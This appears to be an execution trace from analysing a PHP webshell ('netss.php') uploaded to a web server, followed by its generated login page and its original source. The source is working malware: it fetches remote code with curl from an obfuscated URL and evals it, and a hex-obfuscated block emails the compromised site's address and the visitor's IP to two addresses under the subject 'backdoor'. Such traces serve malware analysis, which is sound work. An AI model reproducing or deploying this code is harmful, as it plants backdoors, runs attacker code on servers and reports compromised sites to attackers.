3 71 0 0.144224 971584 ini_set 0 /var/www/html/uploads/netss.php(1) : eval()'d code 5 2 'max_execution_time' 10000
3 71 1 0.144241 971720
3 71 R '30'
3 72 0 0.144254 971616 header 0 /var/www/html/uploads/netss.php(1) : eval()'d code 6 1 'content-Type: text/html; charset=UTF-8'
3 72 1 0.144271 971792
3 72 R NULL
3 73 0 0.144285 971760 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 18 1 '/var/www/html/uploads/netss.php'
4 74 0 0.144299 971760 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/var/www/html/uploads/netss.php'
4 74 1 0.144312 971792
4 74 R '/var/www/html/uploads/netss.php'
4 75 0 0.144326 971760 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/uploads/netss.php'
4 75 1 0.144348 971856
4 75 R '/var/www/html/uploads/netss.php'
3 73 1 0.144364 971760
3 73 R '/var/www/html/uploads/netss.php'
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 18 $myfile = '/var/www/html/uploads/netss.php'
3 76 0 0.144390 971760 strpos 0 /var/www/html/uploads/netss.php(1) : eval()'d code 19 2 '/var/www/html/uploads/netss.php' 'eval()'
3 76 1 0.144404 971832
3 76 R FALSE
2 A /var/www/html/uploads/netss.php(1) : eval()'d code 19 $myfile = '/var/www/html/uploads/netss.php'
3 77 0 0.144428 971760 dirname 0 /var/www/html/uploads/netss.php(1) : eval()'d code 20 1 '/var/www/html/uploads/netss.php'
3 77 1 0.144442 971848
3 77 R '/var/www/html/uploads'
3 78 0 0.144457 971808 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 20 1 '/var/www/html/uploads/'
4 79 0 0.144470 971808 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/var/www/html/uploads/'
4 79 1 0.144482 971840
4 79 R '/var/www/html/uploads/'
4 80 0 0.144496 971808 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/uploads/'
4 80 1 0.144517 971904
4 80 R '/var/www/html/uploads/'
3 78 1 0.144531 971808
3 78 R '/var/www/html/uploads/'
3 81 0 0.144544 971808 define 0 /var/www/html/uploads/netss.php(1) : eval()'d code 20 2 'THISDIR' '/var/www/html/uploads/'
3 81 1 0.144559 971912
3 81 R TRUE
3 82 0 0.144572 971840 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 21 1 '/uploads/netss.php'
4 83 0 0.144586 971840 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/uploads/netss.php'
4 83 1 0.144599 971872
4 83 R '/uploads/netss.php'
4 84 0 0.144613 971840 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/uploads/netss.php'
4 84 1 0.144632 971936
4 84 R '/uploads/netss.php'
3 82 1 0.144647 971840
3 82 R '/uploads/netss.php'
3 85 0 0.144660 972216 strtr 0 /var/www/html/uploads/netss.php(1) : eval()'d code 21 2 '/var/www/html/uploads/netss.php' ['/uploads/netss.php' => '']
3 85 1 0.144675 972320
3 85 R '/var/www/html'
3 86 0 0.144690 971880 strdir 1 /var/www/html/uploads/netss.php(1) : eval()'d code 21 1 '/var/www/html/'
4 87 0 0.144703 971880 chop 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 1 '/var/www/html/'
4 87 1 0.144716 971912
4 87 R '/var/www/html/'
4 88 0 0.144729 971880 str_replace 0 /var/www/html/uploads/netss.php(1) : eval()'d code 9 3 [0 => '\\', 1 => '//', 2 => '%27', 3 => '%22'] [0 => '/', 1 => '/', 2 => '\'', 3 => '"'] '/var/www/html/'
4 88 1 0.144749 971976
4 88 R '/var/www/html/'
3 86 1 0.144762 971880
3 86 R '/var/www/html/'
3 89 0 0.144775 971880 define 0 /var/www/html/uploads/netss.php(1) : eval()'d code 21 2 'ROOTDIR' '/var/www/html/'
3 89 1 0.144790 971984
3 89 R TRUE
3 90 0 0.144803 971912 getinfo 1 /var/www/html/uploads/netss.php(1) : eval()'d code 22 0
4 91 0 0.144818 972312 function_exists 0 /var/www/html/uploads/netss.php(1) : eval()'d code 378 1 'phpinfo'
4 91 1 0.144835 972352
4 91 R TRUE
3 A /var/www/html/uploads/netss.php(1) : eval()'d code 378 $infos = [0 => NULL, 1 => '531e70a6745d07a8befbd79e5cc7e4c1', 2 => TRUE, 3 => '127.0.0.1']
4 92 0 0.144868 972312 md5 0 /var/www/html/uploads/netss.php(1) : eval()'d code 379 1 NULL
4 92 1 0.144883 972408
4 92 R 'd41d8cd98f00b204e9800998ecf8427e'
0.145591 891920
TRACE END [2023-02-12 21:38:15.617235]
Generated HTML code
<html><head></head><body><center><form method="POST"><input type="password" name="getpwd"> <input type="submit" value="Go"></form></center></body></html>Original PHP code
<?php $password="531e70a6745d07a8befbd79e5cc7e4c1"; $ch=curl_init(base64_decode(strrev("AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa")));curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$r=curl_exec($ch);$e=base64_decode(strrev("4zP"));eval($e.$r);?><?php ${"\x47\x4cO\x42\x41\x4c\x53"}["\x62t\x75\x6a\x75k\x5fc\x6e\x65y\x6d\x66v\x72\x6a\x67e\x70x\x68m\x74\x79\x73\x61t\x69k"]="t\x75j\x75a\x6em\x61i\x6c";${"\x47L\x4fB\x41\x4cS"}["q\x6f\x64p\x78\x6fe\x7a\x5f\x5fj\x6b\x66\x6f\x6bm\x6az\x63\x79"]="x\x5fp\x61\x74h";${"\x47L\x4f\x42A\x4c\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]="_\x53E\x52\x56\x45R";${"G\x4cO\x42\x41\x4c\x53"}["j\x79s\x63u\x5f\x63\x6bq\x69i\x68g\x6bd\x5fe\x76w\x69a"]="p\x65\x73\x61n\x5fa\x6c\x65r\x74";@ini_set('output_buffering',0);@ini_set('display_errors',0);set_time_limit(0);ini_set('memory_limit','64M');header('Content-Type: text/html; charset=UTF-8');${${"G\x4cO\x42A\x4cS"}["\x62t\x75\x6a\x75k\x5fc\x6e\x65y\x6d\x66v\x72\x6a\x67e\x70x\x68m\x74\x79\x73\x61t\x69k"]}="l\x6fg\x6ed\x61s\x6du\x40g\x6da\x69\x6c.\x63\x6fm\x2c\x20n\x64a\x73\x6d\x75\x77\x68y\x40y\x61\x68o\x6f.\x63\x6f\x6d";${${"G\x4cO\x42A\x4cS"}["q\x6f\x64p\x78\x6fe\x7a\x5f\x5fj\x6b\x66\x6f\x6bm\x6az\x63\x79"]}="\x68t\x74p\x3a/\x2f".${${"G\x4c\x4f\x42\x41L\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['SERVER_NAME'].${${"\x47\x4c\x4f\x42A\x4cS"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['REQUEST_URI'];${${"\x47L\x4fB\x41\x4cS"}["j\x79s\x63u\x5f\x63\x6bq\x69i\x68g\x6bd\x5fe\x76w\x69a"]}="\x66\x69\x78\x20${${"\x47\x4cO\x42\x41L\x53"}["q\x6f\x64p\x78\x6fe\x7a\x5f\x5fj\x6b\x66\x6f\x6bm\x6az\x63\x79"]}\x20\x3a\x70\x20\x2a\x49\x50\x20\x41\x64\x64\x72\x65\x73\x73\x20\x3a\x20\x5b\x20".${${"G\x4c\x4fB\x41\x4c\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['REMOTE_ADDR']."\x20\x5d";mail(${${"G\x4c\x4f\x42\x41L\x53"}["\x62t\x75\x6a\x75k\x5fc\x6e\x65y\x6d\x66v\x72\x6a\x67e\x70x\x68m\x74\x79\x73\x61t\x69k"]},"backdoor",${${"G\x4c\x4fB\x41\x4cS"}["j\x79s\x63u\x5f\x63\x6bq\x69i\x68g\x6bd\x5fe\x76w\x69a"]},"[ ".${${"\x47\x4c\x4f\x42A\x4c\x53"}["h\x63_\x66\x6fn\x76\x77\x63t\x71_\x75\x77t\x64\x62a\x6e\x63_\x5fv\x73g\x7ao\x67u\x74\x76a\x67t\x61n"]}['REMOTE_ADDR']." \x5d"); ?>